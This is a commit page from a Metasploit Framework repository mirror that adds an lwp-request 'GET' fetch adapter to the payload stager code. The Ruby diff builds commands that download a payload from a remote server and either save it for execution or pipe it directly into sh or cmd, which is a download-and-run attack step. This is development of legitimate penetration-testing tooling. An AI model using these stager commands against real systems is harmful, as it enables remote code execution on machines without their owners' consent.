adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity

Land #20451, adds support for lwp-request GET fetch adapter

Browse Source 
Msf::Payload::Adapter::Fetch: Add lwp-request GET fetch adapter
This commit is contained in:
msutovsky-r7
2025-08-11 12:54:41 +02:00
committed by GitHub
parent b8dad8d85f d0f0b3532f
commit b23775124b
2 changed files with 44 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
lib/msf/core/payload/adapter/fetch.rb
+42 -1
View File
@@ -86,7 +86,7 @@ module Msf::Payload::Adapter::Fetch
def pipe_supported_binaries
# this is going to expand when we add psh support
return %w[CURL] if windows?
%w[WGET CURL]
%w[WGET GET CURL]
end
def generate(opts = {})
@@ -115,6 +115,8 @@ module Msf::Payload::Adapter::Fetch
case datastore['FETCH_COMMAND'].upcase
when 'WGET'
return _generate_wget_pipe
when 'GET'
return _generate_get_pipe
when 'CURL'
return _generate_curl_pipe
else
@@ -132,6 +134,8 @@ module Msf::Payload::Adapter::Fetch
return _generate_tnftp_command
when 'WGET'
return _generate_wget_command
when 'GET'
return _generate_get_command
when 'CURL'
return _generate_curl_command
when 'TFTP'
@@ -336,6 +340,43 @@ module Msf::Payload::Adapter::Fetch
end
end
def _generate_get_command
# Specifying the method (-m GET) is necessary on OSX
case fetch_protocol
when 'HTTP'
get_file_cmd = "GET -m GET http://#{download_uri}>#{_remote_destination}"
when 'HTTPS'
# There is no way to disable cert check in GET ...
print_error('GET binary does not support insecure mode')
fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
get_file_cmd = "GET -m GET https://#{download_uri}>#{_remote_destination}"
when 'FTP'
get_file_cmd = "GET ftp://#{download_uri}>#{_remote_destination}"
else
fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
end
_execute_add(get_file_cmd)
end
def _generate_get_pipe
# Specifying the method (-m GET) is necessary on OSX
execute_cmd = 'sh'
execute_cmd = 'cmd' if windows?
case fetch_protocol
when 'HTTP'
return "GET -m GET http://#{_download_pipe}|#{execute_cmd}"
when 'HTTPS'
# There is no way to disable cert check in GET ...
print_error('GET binary does not support insecure mode')
fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
return "GET -m GET https://#{_download_pipe}|#{execute_cmd}"
when 'FTP'
return "GET ftp://#{_download_pipe}|#{execute_cmd}"
else
fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
end
end
def _generate_ftp_command
case fetch_protocol
when 'FTP'
lib/msf/core/payload/adapter/fetch/linux_options.rb
+2 -2
View File
@@ -3,10 +3,10 @@ module Msf::Payload::Adapter::Fetch::LinuxOptions
super
register_options(
[
Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP GET TFTP TNFTP WGET]]),
Msf::OptEnum.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8','none', ['none','bash','python3.8+']]),
Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'none']),
Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL WGET]]),
Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL GET WGET]]),
Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', './'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'none'])
]
)